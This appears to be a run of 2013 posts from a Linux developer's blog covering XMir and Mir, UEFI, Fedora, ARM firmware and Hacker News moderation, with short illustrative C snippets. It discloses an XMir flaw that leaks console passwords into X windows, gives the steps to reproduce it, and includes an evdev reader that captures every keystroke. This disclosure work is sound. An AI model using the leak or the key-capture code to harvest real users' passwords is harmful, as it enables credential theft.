So, after several years of considering it, I'm finally standing for the TAB. I've been an active developer at most levels of the Linux stack, from the kernel through to desktop environments. I've worked closely with distributions. I've even worked closely with firmware developers. I'm not intimately involved in any of the other Linux Foundation projects, but I have experience that allows me to better understand their needs and motivations than I'd have from having spent my entire life living in the kernel. Being on the TAB would make it easier to ensure that these projects are represented in a meaningful way.

Of the other people who I know are standing (and this list may well grow longer), I'm inclined to vote for:
  • Greg Kroah-Hartman - while we've disagreed on a range of points, Greg's worked closely with userspace developers and even represents the Linux Foundation on the UEFI Forum. He's able to provide a wide range of expertise to the TAB and it benefits from that.
  • Jon Corbet - Jon's work on LWN should need no introduction. He's done an amazing job of keeping track of a range of technical developments across the entire Linux community, so is uniquely well suited to making sure that a range of opinions is represented.
  • Sarah Sharp - Sarah's certainly primarily a kernel developer, but she's been the loudest voice calling for the kernel community to spend some time thinking about whether it's as welcoming as it could be. Increasing the diversity of the kernel community allows us to hear a wider range of technical viewpoints, which benefits both the kernel and everything that depends on it.

The election is currently scheduled to take place at the National Museum in Edinburgh on the evening of the 23rd of October. If you're attending LinuxCon or one of the colocated events, please do come along and vote.

(Updated to correct a typo)
2013-10-15 10:10

Hacker News is a social echo chamber

Hacker News is a fairly influential link aggregation site, with stories submitted and voted on by users. As explained in the FAQ, the ranking of stories is roughly determined by the number of votes divided by a function of the time since submission. It's not a huge traffic driver (my personal experience of stories on the front page is on the order of 30,000 hits), but it's notable because the demographic tends to include a more technically literate and influential set of readers than most other sites. The discussion that ensues from technical posts often includes meaningful feedback from domain experts. Stories that appear there are likely to be noted by technology workers, especially in the Silicon Valley startup field[1].
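
The commonly cited approximation of that ranking function - not taken from HN's actual source, and with a gravity exponent that's only ever quoted approximately - looks something like this:

#include <math.h>
#include <stdio.h>

/* Approximate Hacker News ranking: points decay against age. The gravity
 * exponent is usually quoted as somewhere around 1.5-1.8; treat the exact
 * value as an assumption. The flagging and flamewar mechanisms discussed
 * below apply additional penalties on top of this. */
static double rank(int points, double age_hours)
{
    const double gravity = 1.8;
    return (points - 1) / pow(age_hours + 2.0, gravity);
}

int main(void)
{
    printf("100 points at  2 hours: %.2f\n", rank(100, 2));
    printf("100 points at 12 hours: %.2f\n", rank(100, 12));
    return 0;
}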

That rather specific demographic appears to correlate with other traits. There's a rather more techno-libertarian bias on Hacker News than on most general discussion forums, which is consistent with the startup-oriented culture that it springs from - the desire to provide disruptive solutions to real world problems tends to collide with existing regulatory frameworks, so it's unsurprising that a belief in individual rights and small government would overlap with US startup culture. There's a leaning towards the use of web technologies rather than traditional client applications, which matches what people are doing in the rest of the world. And there's more enthusiasm for liberal open-source licenses over Copyleft licenses, which makes sense in a web-focused environment (as I wrote about here).

Now, personally I'm a big-government, client-app, Copyleft kind of person, but for the most part I don't think the above is actively dangerous. It's inevitable that political views will vary, we'll probably continue to cycle between thick and thin clients for generations and nobody's ever going to demonstrably prove that one licensing model deserves to win over another. But what is important is that the ongoing debates between these opinions be driven by facts, and that it remain obvious that these disagreements exist. As far as technical (and even political) discussion goes, Hacker News doesn't seem to have a problem with that. Disagreeing with the orthodoxy is tolerated.

This seems less true when it comes to social issues. When a posting discussing the myth of the natural born programmer[2] hit the front page, the top-rated comment was Paul Graham[3] off-handedly discounting the conclusions drawn. The original story linked to a review of peer-reviewed scientific research. Graham simply discounted it on the basis of his preconceptions. Shortly afterwards, the story plummeted off the front page, now surrounded by stories posted around the same time but with much lower scores.

How does this happen? There's two publicised methods which can result in stories dropping down the order. Users with high karma scores (either via submitting popular stories or writing popular comments) are able to flag submissions, and if enough do so then a negative weighting is applied to the story. There's also a flamewar detector, a heuristic that attempts to detect contentious subjects and pushes them off the front page.

The effect of both is to enforce the status quo of social beliefs. Stories that appear to challenge the narrative that good programmers are just naturally talented tend to vanish. Stories that discuss the difficulties faced by minorities in our field are summarily disappeared. There are no social problems in the technology industry. We have always been at war with Eastasia.

This isn't healthy. We don't improve the state of the software industry by hiding stories that expose conflicts. Flamewars don't solve problems, but without them we'd be entirely unaware of how much of a victim blaming mentality exists amongst our peers. It's true that conflict may reinforce preconceptions, causing people to dig in as they defend their beliefs. However, the absence of conflict does nothing to counteract that. If you're never exposed to opinions you disagree with, you'll never question your existing beliefs.

Hacker News is a privately run site and nobody's under any obligation to change how they choose to run it. But the focus on avoiding conflict to such an extent that controversial stories receive less exposure than ones that fit people's existing beliefs doesn't enhance our community. If we want to be able to use technology as an instrument of beneficial change to society as a whole, we benefit from building a diverse and welcoming community and questioning our preconceptions. Building a social echo chamber risks marginalising us from the rest of society, gradually becoming ignored and irrelevant as our self-reinforcing opinions drift ever further away from the mainstream. It doesn't help anybody.

[1] During the batch of interviews I did last year, two separate interviewers both mentioned a story they'd read on Hacker News that turned out to have been written by me. I'm not saying that that's what determined a hire/don't hire decision, but it seems likely that it helped.
[2] The article in question discusses the pervasive idea that some people are inherently good programmers. It turns out that perpetuating the idea that some people are just born good at a particular skill actually discourages others from even trying to learn it, even those who are just as capable.
[3] One of the co-founders of Y-Combinator and creator of Hacker News.

(Edited to fix a footnote reference)
2013-10-02 11:42

The state of XMir

XMir's been delayed from Ubuntu 13.10. The stated reason is that multi-monitor support isn't sufficiently reliable. That's true, but it's far from the only problem that XMir still has:

  • It's still broken on some single-monitor systems

    Some machines have display corruption. There are writes to freed memory. To be fair, some of the behaviour that's been seen has been down to underlying bugs in the Xorg drivers that were never triggered under normal use but are hit by XMir. Others are down to implicit assumptions made in the drivers that XMir happens to violate. The problem is that there doesn't appear to have been enough room in the schedule to deal with these interactions, presumably because nobody accounted for the inevitable "This thing we thought would be easy turns out to be difficult" part of the project.

  • The input driver bug still isn't really fixed

    I've mentioned this bug before. It's now marked "Fix released" which is kind of true but not really. Mir now tells XMir that the VT is changing before the VT is changed, but it doesn't wait for that to complete before switching the VTs. Until XMir is scheduled and runs, it's still receiving input events. In most circumstances that window is small, so there's no real risk of triggering it accidentally.

    There's one corner case where it might still cause problems. Simply running isn't enough - XMir has to make progress through its event loop. That'll only happen if the X server is processing its wakeup events, and it's possible to effectively stall that by submitting a sufficiently awkward drawing request to the server. The X server will appear to freeze, and if the user then attempts to work out what's going on by switching to a VT and logging in, those input events will still be going to XMir. It's left as an exercise to the reader to construct ways to take advantage of this.

    This can't happen in Xorg because the VT switch is blocked until the input devices have been released. Mir could have done the same, but doesn't because of a conscious design decision - in the Ubuntu Phone world, clients stop doing things when they're told to. Ubuntu Desktop is expected to behave the same way.

    This is an unfortunate situation to be in. Ubuntu Desktop was told that they were switching to XMir, but Mir development seems to be driven primarily by the needs of Ubuntu Phone. XMir has to do things that no other Mir client will ever cope with, and unless Mir development takes that into account it's inevitably going to suffer breakage like this. Canonical management needs to resolve this if there's any hope of ever shipping XMir as the default desktop environment.

  • It's still missing features

    XMir doesn't support colour profiles. XRandR properties aren't exposed, so there's no way to control TV output encoding or overscan. There's still no hardware cursor support. Switching to XMir now would reduce functionality without providing any user-visible gain.


It's clear that XMir has turned into a larger project than Canonical had originally anticipated, but that's hardly surprising. There's only one developer with previous X experience working on it full-time, and the announced schedule provided no opportunity to deal with unexpected problems. As if that weren't enough, there's obvious conflict between Ubuntu Desktop and Ubuntu Phone when it comes to developer time and required functionality. The one hardware vendor who's willing to take a public stand has demonstrated that they have no interest in supporting XMir, despite Canonical assuring people that they were already engaging in productive negotiations with GPU manufacturers.

Multiple monitor support may be the single most obvious feature where XMir is lacking, but it's not the only one. Technically and politically, this code is a long way from being ready for prime time. Without significant community contribution, Canonical need to focus on prioritising it appropriately rather than expecting a tiny number of developers to perform miracles. Or, alternatively, they could just drop XMir entirely and focus on Unity 8.
2013-09-22 14:10

Implementing UEFI Boot to Zork

One of the earlier examples of students using MIT computer resources to lay the groundwork for a later commercial endeavour, Zork was originally written in a LISP derivative called MDL. This was later turned into the Zork Implementation Language, a domain specific language that was compiled to target the Z-machine rather than a specific piece of hardware. Combined with machine-specific Z-machine interpreters, this allowed rapid porting of games to a wide range of platforms - the only thing that needed to be rewritten was the interpreter, and that could be reused for any future games running on the same hardware.

Infocom were eventually acquired and killed off, but fan interest in their games continued. New Z-machine interpreters were written in order to allow their games (including Zork) to be run on platforms that Infocom had never targeted. One of the best known is Frotz. This has the advantage of being (a) portable and (b) including a "dumb" UI that makes no assumptions about the availability of any vaguely useful functionality. Like, say, a Curses library.

So, Frotz seemed like the natural choice when this happened. But despite having a set of functionality that makes it look much more like an OS than a boot environment, UEFI doesn't actually expose a standard C library. The EFI Application Development Kit fills that particular gap. Porting Frotz ended up involving far more fixing up of Frotz bugs that tripped up -Werror than anything else. One note, though - make sure you include DevShell in the list of required packages at build time, otherwise file i/o will mysteriously fail.

The tying of file i/o to the shell protocol unfortunately means that Frotz can't be directly launched by the firmware. The Boot to Zork images therefore contain a UEFI shell in the standard boot location (\EFI\BOOT\BOOTX64.EFI) which is executed when the firmware attempts to boot the device. The shell then looks for a file called "startup.nsh" in the root directory of the boot device and executes it. Unfortunately this doesn't actually set the shell equivalent of the current device, and so just launching Frotz from startup.nsh fails when Frotz can't open the Zork data file. The solution for this is simple, if ugly - the script walks through the list of devices, looking for one that contains ZORK1.DAT in the root directory. It then changes to that device and launches Frotz. If Frotz exits, it then resets the system.

This could be avoided by doing some more work and turning Frotz into a more UEFI-native application. Teaching Frotz to make native UEFI calls would avoid the requirement for the shell protocols, and the firmware provides a mechanism to obtain the path of the currently running executable, which would avoid the need to explicitly locate the device. But I'm lazy and this was an "I'm spending the day on a plane" project initially inspired by a Sazerac-fuelled conversation during the UEFI plugfest, not a demonstration of UEFI best practices.
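
For anyone tempted to do that work, the device-walking half is straightforward. Here's a rough EDK2-style sketch (untested, and the function name is mine) of locating ZORK1.DAT without involving the shell protocols:

#include <Uefi.h>
#include <Library/UefiBootServicesTableLib.h>
#include <Protocol/SimpleFileSystem.h>

/* Iterate over every filesystem the firmware knows about and open the
 * first ZORK1.DAT found in a root directory. */
EFI_STATUS FindZorkData(EFI_FILE_PROTOCOL **DataFile)
{
  EFI_STATUS Status;
  UINTN HandleCount, i;
  EFI_HANDLE *Handles;

  Status = gBS->LocateHandleBuffer(ByProtocol,
                                   &gEfiSimpleFileSystemProtocolGuid,
                                   NULL, &HandleCount, &Handles);
  if (EFI_ERROR(Status))
    return Status;

  for (i = 0; i < HandleCount; i++) {
    EFI_SIMPLE_FILE_SYSTEM_PROTOCOL *Fs;
    EFI_FILE_PROTOCOL *Root;

    if (EFI_ERROR(gBS->HandleProtocol(Handles[i],
                                      &gEfiSimpleFileSystemProtocolGuid,
                                      (VOID **)&Fs)))
      continue;
    if (EFI_ERROR(Fs->OpenVolume(Fs, &Root)))
      continue;
    if (!EFI_ERROR(Root->Open(Root, DataFile, L"ZORK1.DAT",
                              EFI_FILE_MODE_READ, 0))) {
      gBS->FreePool(Handles);
      return EFI_SUCCESS;
    }
    Root->Close(Root);
  }
  gBS->FreePool(Handles);
  return EFI_NOT_FOUND;
}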

UEFI Boot To Zork and the source code to the modified Frotz can be downloaded here.

2013-08-22 11:21

Re: Default offerings, target audiences, and the future of Fedora

Eric (a fellow Fedora board member) has a post describing his vision for what Fedora as an end goal should look like. It's essentially an assertion that since we have no idea who our users are or what they want, we should offer them everything on an equal footing.

Shockingly enough, I disagree.

At the most basic level, the output of different Special Interest Groups is not all equal. We've had issues over the past few releases where various spins have shipped in a broken state, because the SIG responsible for producing them doesn't have the resources to actually test them. We're potentially going to end up shipping F20 with old Bluetooth code because the smaller desktops aren't able to port to the new API in time[1]. Promoting these equally implies that they're equal, and doing so when we know it isn't the case is a disservice to our users.

But it's not just about our users. Before I joined the Fedora project, I'd worked on both Debian and Ubuntu. Debian is broadly similar to the current state of Fedora - no strong idea about what is actually being produced, and a desire among many developers to cater to every user's requirements. Ubuntu's pretty much the direct opposite, with a strongly defined goal and a willingness to sacrifice some use cases in order to achieve that goal.

This leads to an interestingly different social dynamic. Ubuntu contributors know what they're working on. If a change furthers the well-defined aim of the project, that change happens. Moving from Ubuntu to Fedora was a shock to me - there were several rough edges in Fedora that simply couldn't be smoothed out because fixing them for one use case would compromise another use case, and nobody could decide which was more important[2]. It's basically unthinkable that such a situation could arise in Ubuntu, not just because there was a self appointed dictator but because there was an explicit goal and people could prioritise based on that[3].

Bluntly, if you have a well-defined goal, people are more likely to either work towards that goal or go and do something else. If you don't, people will just do whatever they want. The risk of defining that goal is that you'll lose some of your existing contributors, but the benefit is that the existing contributors will be more likely to work together rather than heading off in several different directions.

But perhaps more importantly, having a goal can attract people. Ubuntu's Bug #1 was a solid statement of intent. Being freer than Microsoft wasn't enough. Ubuntu had to be better than Microsoft products on every axis, and joining Ubuntu meant that you were going to be part of that. Now it's been closed and Ubuntu's wandered off into convergence land, and signing up to spend your free time on producing something to help someone sell phones is much less compelling than doing it to produce a product you can give to your friends.

Fedora should be the obvious replacement, but it's not because it's unclear to a casual observer what Fedora actually is. The website proudly leads with a description of Fedora as a fast, stable and powerful operating system, but it's obvious that many of the community don't think of Fedora that way - instead it's a playground to produce a range of niche derivatives, with little consideration as to whether contributing to Fedora in that way benefits the project as a whole. Codifying that would actively harm our ability to produce a compelling product, and in turn reduce our ability to attract new contributors even further.

Which is why I think the current proposal to produce three first-class products is exciting. Offering several different desktops on the download page is confusing. Offering distinct desktop, server and cloud products isn't. It makes it clear to our users what we care about, and in turn that makes it easier for users to be excited about contributing to Fedora. Let's not make the mistake of trying to be all things to all people.

[1] Although clearly, in this case, the absence of a stable ABI in BlueZ - despite it having had a dbus interface for the best part of a decade - is a pretty fundamental problem.
[2] See the multi-year argument over default firewall rules and the resulting lack of working SMB browsing or mDNS resolution.
[3] To be fair, one of the reasons I was happy to jump ship was because of the increasingly autocratic way Ubuntu was being run. By the end of my involvement, significant technical decisions were being made in internal IRC channels - despite being on the project's Technical Board, I had no idea how or why some significant technical changes were being made. I don't think this is a fundamental outcome of having a well-defined goal, though. A goal defined by the community (or their elected representatives) should function just as well.
2013-08-22 01:55
Entry tags:

If you ever use text VTs, don't run XMir right now

Update: While this isn't strictly fixed (Mir will still perform a VT switch without waiting to ensure that XMir has released the input devices), the time window for console input events to end up in XMir is now small enough that it's probably not a security problem any more.

It'd be easy to assume that in a Mir-based world, the Mir server receives input events and hands them over to Mir clients. In fact, as I described here, XMir uses standard Xorg input drivers and so receives all input events directly. This led to issues like the duplicate mouse pointer seen in earlier versions of XMir - as well as the pointer being drawn by XMir, Mir was drawing its own pointer.

But there are also more subtle issues. Mir recently gained a fairly simple implementation of VT switching: it listens for input events where a function key is hit while the ctrl and alt modifiers are set[1], then performs the appropriate ioctl on /dev/console and the kernel switches the VT. The problem here is that Mir doesn't tell XMir that this has happened, and so XMir still has all of its input devices open and still pays attention to any input events.
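
For the curious, the kernel interface involved here is tiny. A minimal sketch of a VT switch done the same way might look like this (the console path and target VT are illustrative, and Mir's actual code will differ in the details):

#include <fcntl.h>
#include <stdio.h>
#include <sys/ioctl.h>
#include <linux/vt.h>

int main(void)
{
    /* Needs enough privilege to open the console */
    int fd = open("/dev/console", O_RDWR);
    if (fd < 0) {
        perror("open /dev/console");
        return 1;
    }
    /* Ask the kernel to switch to VT 1, then wait for the switch to finish */
    if (ioctl(fd, VT_ACTIVATE, 1) < 0 || ioctl(fd, VT_WAITACTIVE, 1) < 0) {
        perror("VT switch");
        return 1;
    }
    return 0;
}

Note that nothing in this sequence tells whatever else has the input devices open that the switch happened - which is exactly the gap XMir falls into.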

This is pretty easy to demonstrate. Open a terminal or text editor under XMir and make sure it has focus. Hit ctrl+alt+f1 and log in. Hit ctrl+alt+f7 to switch back. Your username and password will be sitting in the window.

This is Launchpad bug 1192843, filed on the 20th of June. A month and a half later, Mir was added to the main Ubuntu repositories. Towards the bottom, there's a note saying "XMir always listening to keyboard, passwords may appear in other X sessions". This is pretty misleading, since "other X sessions" implies that it's only going to happen if you run multiple X sessions. Regardless, it's a known bug that can potentially leak user passwords.

So it's kind of odd that that's the only mention of it, hidden in a disused toilet behind a "Doesn't work on VESA" sign. If you follow the link to the installation instructions, you get a page which doesn't mention the problem at all. Now, to be fair, it doesn't mention any of the other problems with Mir either, but the other problems merely result in things not working rather than your password ending up in IRC.

This being developmental software isn't an excuse. There's been plenty of Canonical-led publicity about Mir and people are inevitably going to test it out. The lack of clear and explicit warnings is utterly inexcusable, and these packages shouldn't have landed in the archive until the issue was fixed. This is brutally irresponsible behaviour on the part of Canonical.

So, if you ever switch to a text VT, either make sure you're not running XMir at the moment or make sure that you never leave any kind of network client focused when you switch away from X. And you might want to check IRC and IM logs to make sure you haven't made a mistake already.

[1] One lesser-known feature of X is that the VT switching events are actually configured in the keymap. ctrl+alt+f1 defaults to switching to VT1, but you can remap any key combination to any VT switch event. Except, of course, this is broken in XMir because Mir catches the keystroke and handles it anyway.
2013-08-10 00:23
Entry tags:

When to add a platform-specific quirk to a Linux driver

If you're tempted to add a platform-specific quirk to a Linux driver, pause and do the following:

  1. Check whether the platform works correctly with the generic Windows driver for the hardware in question. If it requires a platform-specific driver rather than the generic one, adding a quirk is probably ok.
  2. If the generic Windows driver works, check whether there's any evidence of platform-specific code in the Windows driver. This will typically be in the .inf file, but occasionally you'll want to run strings against the Windows driver and see whether any functions or strings match the platform in question. If there's evidence of special-casing in the generic Windows driver, adding a quirk is probably ok.
  3. If the generic Windows driver works and doesn't appear to have any platform-specific special casing, don't add a quirk. You'll plausibly fix the machine you care about, but you won't fix any others that have the same behaviour. Even worse, if someone does eventually fix the problem properly, there's a risk that your special-casing will now break your system.

The moral to this story is: if you think adding a quirk is the right solution, you're almost certainly wrong.
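
For context, the quirks in question typically look something like the following - a hypothetical sketch of a DMI-matched special case, with an invented vendor, product and helper rather than code from any real driver:

#include <linux/types.h>
#include <linux/dmi.h>

/* Hypothetical machine that misbehaves with the generic code path */
static const struct dmi_system_id example_quirk_table[] = {
    {
        .ident = "ExampleCorp Frobulator 9000",
        .matches = {
            DMI_MATCH(DMI_SYS_VENDOR, "ExampleCorp"),
            DMI_MATCH(DMI_PRODUCT_NAME, "Frobulator 9000"),
        },
    },
    { }  /* terminating entry */
};

static bool example_needs_workaround(void)
{
    /* dmi_check_system() returns the number of table entries that matched */
    return dmi_check_system(example_quirk_table) > 0;
}

The trouble with this pattern is exactly what step 3 describes: it only ever helps the machines listed in the table.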
2013-08-01 01:16
Entry tags:

Don't ship 32-bit UEFI firmware on x86

Shipping a UEFI-bootable Linux distribution is a touch awkward[1], with the main sticking point being the necessity to produce boot media with multiple El-Torito images. An El-Torito image is an image of either a floppy disk or a small hard drive, embedded into the ISO. This allows BIOS systems to look for an El-Torito image, hook some interrupts and then boot without the BIOS having to care about the fact that the image is embedded in an ISO-9660 filesystem. UEFI systems will look for an El-Torito image with a special tag - if they find it they'll mount it as a FAT filesystem and look for a bootloader, and if not they'll fall back to BIOS compatibility.

So, if you want a CD that'll boot on both BIOS and UEFI systems, you need two El-Torito images - one for BIOS, one for UEFI. Unfortunately, various BIOSes deal exceptionally badly with CD images that contain more than one El-Torito image. The most common failure case is to print a menu asking you to choose an option without labelling the options, but some will just fail outright. Thankfully, this is pretty much exclusively limited to 32-bit systems.

Things get irritatingly more complicated due to a quirk of UEFI. UEFI is based on executing code in native mode. That means that 32-bit UEFI systems can't execute 64-bit code in firmware, even if the CPU is capable of it. A 64-bit OS can only boot on 32-bit UEFI if it has very ugly compatibility hacks, including having to rewrite structures and register state every time it makes a UEFI call. The only OS I'm aware of that implements this is MacOS X. Having looked into what it'd take to implement it in Linux, I decided that hammering rusty nails through my feet would be a preferable use of time. Thankfully, I went drinking instead.

So distributions have a choice. They can either produce UEFI-bootable CD images for 32-bit x86 and risk failures on actual 32-bit systems, or they can ignore UEFI entirely on 32-bit and succeed in booting on all the hardware that people actually own[2]. Unsurprisingly, they tend to choose the second option.

So, if you're building an x86 hardware platform, don't ship with 32-bit UEFI. If you're stuck with a 32-bit CPU then just ship BIOS. If you have a 64-bit CPU then ship a 64-bit UEFI. If you ship with 32-bit UEFI, no significant existing Linux distribution will support you, and you'll face an uphill battle to convince them to do so.

32-bit UEFI. Just say what on earth were you thinking, please, no, can't you find a solution that doesn't involve me getting tetanus jabs.

(If you're worried about the extra memory consumption of 64-bit OSes, just encourage 32-bit userspace on a 64-bit kernel. Or just boot via BIOS)

[1] See the number that still don't manage it despite having had several years to adapt
[2] Until recently, the only vendor to ship 32-bit UEFI firmware on volume hardware was Apple. This was fine on their 32-bit systems, but on their 64-bit systems with 32-bit UEFI booting a 64-bit version of Windows would result in boot failure. Apple rectified this by stating that 64-bit Windows wasn't supported on platforms with 32-bit UEFI, which is a neat trick if you can manage it. 32-bit Windows (and Linux) was fine because it didn't include a UEFI boot image and so didn't trigger the bug.
2013-07-22 08:51
Entry tags:

ARM and firmware specifications

Jon Masters, Chief ARM Architect at Red Hat, recently posted a description of his expectations for baseline arm64 servers. The quick summary is that systems should implement UEFI and ACPI, and any more traditional ARM boot mechanisms should be ignored. This is an interesting departure from the status quo in the ARM world, and it's worth thinking about the benefits and drawbacks of this approach.

It's very easy to build a generic kernel for most x86 systems, since the PC platform is fairly well defined even if not terribly well specified. Where system hardware does vary, it's almost always exposed on an enumerable bus (such as PCI or USB) which allows the OS to bind appropriate drivers. Things are different in the ARM world. Even once you're past the point of different SoC vendors requiring different kernel setup code and drivers, you still have to cope with the fact that system vendors can wire these SoCs up very differently. Hardware is often attached via GPIO lines without any means to enumerate them. The end result is that you've traditionally needed a different kernel for every ARM board. This is viable if you're selling the OS and hardware as a single product, but less viable if there's any desire to run a generic OS on the hardware.

The solution that's been adopted for this in the Linux world is called Device Tree. Device Tree actually has significant history, having been used as the device descriptor format in Open Firmware. Since there was already support for it in the Linux kernel, adapting it for use in ARM devices was straightforward. Device Tree-aware devices can pass a descriptor blob to the kernel at startup[1], and devices without that knowledge can have a blob built into the kernel.
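
To give a flavour of how the contents of that blob reach a driver, here's a rough sketch of a platform driver binding against an invented "example,widget" compatible string and reading a property from its Device Tree node - purely illustrative, not taken from any real driver:

#include <linux/module.h>
#include <linux/of.h>
#include <linux/platform_device.h>

static int example_probe(struct platform_device *pdev)
{
    struct device_node *np = pdev->dev.of_node;
    u32 freq;

    /* Pull a board-specific value straight out of the Device Tree node */
    if (of_property_read_u32(np, "clock-frequency", &freq))
        return -EINVAL;

    dev_info(&pdev->dev, "clock-frequency = %u\n", freq);
    return 0;
}

/* The kernel matches this driver against any DT node with this compatible string */
static const struct of_device_id example_of_match[] = {
    { .compatible = "example,widget" },
    { }
};
MODULE_DEVICE_TABLE(of, example_of_match);

static struct platform_driver example_driver = {
    .probe = example_probe,
    .driver = {
        .name = "example-widget",
        .of_match_table = example_of_match,
    },
};
module_platform_driver(example_driver);

MODULE_LICENSE("GPL");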

So, if this problem is already solved, why the push to move to UEFI and ACPI? This push didn't actually originate in the Linux world - Microsoft mandate that Windows RT devices implement UEFI and ACPI, and were they to launch a Windows ARM server product they would probably carry that requirement over. That makes sense for Microsoft, since recent versions of Windows have been x86 only and so have grown all kinds of support for ACPI and UEFI. Supporting Device Tree would require Microsoft to rewrite large parts of Windows, whereas mandating UEFI and ACPI allowed them to reuse most of their existing Windows boot and driver code. As a result, largely at Microsoft's behest, ACPI 5 has grown a range of additional features for describing things like GPIO pinouts and I2C connections. Whatever your weird device layout, you can probably express it via ACPI.

This argument works less well for Linux. Linux already supports Device Tree, whereas it currently doesn't support ACPI or UEFI on ARM[2]. Hardware vendors are already used to working with Device Tree. Moving to UEFI and ACPI has the potential to uncover a range of exciting new kernel issues and vendor bugs. It's not obviously an engineering win.

So how about users? There's an argument that since server vendors are now mostly shipping ACPI and UEFI systems, having ARM support these technologies makes it easier for customers to replace x86 systems with ARM systems. This really doesn't fly for ACPI, which is entirely invisible to the user. There are no standard ACPI entry points for system configuration, and the bits of ACPI that are generically useful (such as configuring system wakeup times) are already abstracted away to a standard interface by the kernel. It's somewhat more compelling for UEFI. UEFI supports a platform-independent bytecode language (EFI Byte Code, or EBC), which means that customers can write their own system management utilities, build them for EBC and then deploy them to their servers without caring about whether they're x86 or ARM. Want a bootloader that'll hit an internal HTTP server in order to determine which system image to deploy, and which works on both x86 and ARM? Straightforward.
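
As an illustration of what "architecture-independent" means here, a UEFI application is just C written against the firmware's system table - a minimal sketch using the gnu-efi headers is below. Whether you then build it for x86-64, ARM or (in principle) EBC is a toolchain decision; producing an actual EBC binary requires Intel's EBC compiler rather than gnu-efi, so treat this purely as a sketch:

#include <efi.h>

/* Standard UEFI entry point: the firmware hands us an image handle and the system table */
EFI_STATUS EFIAPI efi_main(EFI_HANDLE ImageHandle, EFI_SYSTEM_TABLE *SystemTable)
{
    /* Talk to the firmware console via the system table - nothing here
       depends on the underlying CPU architecture */
    SystemTable->ConOut->OutputString(SystemTable->ConOut,
                                      L"Hello from firmware land\r\n");
    return EFI_SUCCESS;
}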

Arnd Bergmann has an interesting counterargument. In a nutshell, ARM servers aren't currently aiming for the same market as x86 servers, and as a result customers are unlikely to gain any significant benefit from shared functionality between the two.

So if there's no real benefit to users, and if there's no benefit to kernel developers, what's the point? The main one that springs to mind is that there is a benefit to distributions. Moving to UEFI means that there's a standard mechanism for distributions to interact with the firmware and configure the bootloader. The traditional ARM approach has been for vendors to ship their own version of u-boot. If that's in flash then it's not much of a problem[3], but if it's on disk then you have to ship a range of different bootloaders and know which one to install (and let's not even talk about initial bootstrapping).

This seems like the most compelling argument. UEFI provides a genuine benefit for distributions, and long term it probably provides some benefit to customers. The question is whether that benefit is worth the flux. The same distribution benefit could be gained by simply mandating a minimum set of u-boot functionality, which would seem much more straightforward. The customer benefit is currently unclear.

In the end it'll probably be a market decision. If Red Hat produce an ARM product that has these requirements, and if Suse produce an ARM product that will work with u-boot and Device Tree, it'll be up to vendors to decide whether the additional work to support UEFI/ACPI is worth it in order to be able to sell to customers who want Red Hat. I expect that large vendors like HP and Dell will probably do it, but the smaller ones may not. The customer demand issue is also going to be unclear until we learn whether using UEFI is something that customers actually care about, rather than a theoretical benefit.

Overall, I'm on the fence as to whether a UEFI requirement is going to stick, and I suspect that the ACPI requirement is tilting at windmills. There's nothing stopping vendors from providing a Device Tree blob from UEFI, and I can't think of any benefits they gain from using ACPI instead. Vendor interest in the generic parts of the ACPI spec has been tepid even in the x86 world (the vast majority of ACPI spec updates come from Microsoft and Intel, not any of the system vendors), and I don't see that changing with the introduction of a range of ARM vendors who are already happy with Device Tree.

We'll see. Linux is going to need to gain the support for UEFI and ACPI on ARM in any case, since there's already hardware shipping in that configuration. But with ARM vendors still getting to grips with Device Tree, forcing them to go through another change in how they do things is going to be hard work. Red Hat may be successful in enforcing these requirements at the cost of some vendor unhappiness, or Red Hat may find that their product doesn't boot on most of the available hardware. It's an aggressive gamble, and while it'll be interesting to see how it plays out, I'm not that optimistic.

[1] The blob could be pulled from the firmware, but it's not uncommon for it to be built into u-boot instead. This does mean that you have a device-specific u-boot even if you have a generic kernel, but that's typically true anyway.
[2] Patches have been posted for ARM UEFI support. They're not mergeable in their current form, but they should be in the near future. ACPI support is in development.
[3] Although not all u-boots are created equal - some vendors ship versions that will only boot off FAT, some vendors ship versions that will only boot off ext2. Having to special case this stuff in your installer is a pain.
2013-07-15 12:09
Entry tags:

How XMir and Mir fit together

Mir is Canonical's new display server. It fulfils a broadly similar role to Wayland and Android's Surfaceflinger, in that it takes final responsibility for getting pixels onto the screen. XMir is an X server that runs on top of Mir. It permits applications that know how to speak the X protocol but don't know how to speak to Mir (ie, approximately all of them at present) to run in a Mir-based environment.

For Ubuntu 13.10, Canonical are proposing to use Mir by default. This doesn't mean that most applications will be using Mir, though - instead, the default session will run XMir as a full-screen client and a normal X environment will be run on that. This lets Canonical deploy Mir without forcing anyone to update their applications, allowing them to take a gradual approach. By 14.10, Canonical expect the default Unity session to be a Mir client rather than an X client. In theory it will then be possible to run an Ubuntu system without any X applications at all, leaving XMir to do nothing other than run legacy applications.

Of course, this requires a certain amount of replumbing. X would normally be responsible for doing things like setting up the screen and pushing the pixels out to the hardware, but this is now handled by Mir instead. Where a native X server would allocate a framebuffer in video memory and render into it, XMir asks Mir for a window corresponding to the size of the screen and renders into that and then simply asks Mir to display it. This step is actually more interesting than it sounds.

Unless you're willing to throw lots of CPU at them, unaccelerated graphics are slow. Even if you are, you're going to end up consuming more power for the same performance, so XMir would be impractical if it didn't provide access to accelerated hardware graphics functions. It makes use of the existing Xorg accelerated X drivers to do this, which is as simple as telling the drivers to render into the window that XMir requested from Mir rather than into the video framebuffer directly. In other words, when displaying through XMir, you're using exactly the same display driver stack as you would be if you were using Xorg. In theory you'd expect identical performance - in practice there's a 10-20% performance hit right now, but that's being actively worked on. Fullscreen 3D apps will also currently take a hit due to there being no support for skipping compositing, which is being fixed. XMir should certainly be capable of performing around as well as native X, but there's no reason for it to be any faster.

The output drivers aren't the only part of the stack. XMir still needs some way to get input events. You might naively expect that Mir would forward input events to XMir, but the current state of affairs is that XMir loads the existing X input drivers which in turn open the input devices themselves. This explains why XMir currently shows two cursors[1] - the first cursor is the Mir cursor that's being driven by the input events Mir is receiving, while the second is the cursor being drawn by XMir in response to the input events that it's receiving[2].
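
What the X input drivers are doing is, in essence, the following sketch: open an evdev node and read events from it for as long as the file descriptor stays open (the device path is illustrative - the real drivers enumerate devices rather than hardcoding one, and opening them generally requires root):

#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
#include <linux/input.h>

int main(void)
{
    int fd = open("/dev/input/event0", O_RDONLY);
    struct input_event ev;

    if (fd < 0) {
        perror("open");
        return 1;
    }
    /* Events keep arriving for as long as the fd is open, regardless of
       which client the display server thinks has focus */
    while (read(fd, &ev, sizeof(ev)) == sizeof(ev)) {
        if (ev.type == EV_KEY)
            printf("key %d value %d\n", ev.code, ev.value);
    }
    return 0;
}

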